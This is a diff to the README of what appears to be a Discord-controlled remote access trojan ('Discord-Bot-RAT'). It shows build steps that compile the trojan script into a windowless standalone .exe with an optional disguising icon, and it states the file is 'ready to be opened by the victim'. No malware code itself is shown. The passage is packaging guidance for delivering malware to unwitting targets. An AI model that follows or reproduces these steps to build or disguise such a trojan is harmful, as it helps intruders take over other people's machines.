1ypi/Discord-Bot-RAT/README.md

 ```
 pip install pyinstaller

+pip install -r requirements.txt

 pyinstaller --onefile --windowed oney.py

-# you can add --icon=assets/icon.ico before oney.py for a custom icon.
+# you can add --icon=icon.ico before oney.py for a custom icon (icon has to be in the same folder and has to be named "icon" with the extension ".ico").
 ```
 This will generate a .exe file in the dist folder ready to be opened by the victim, no requirements or python needed to open it.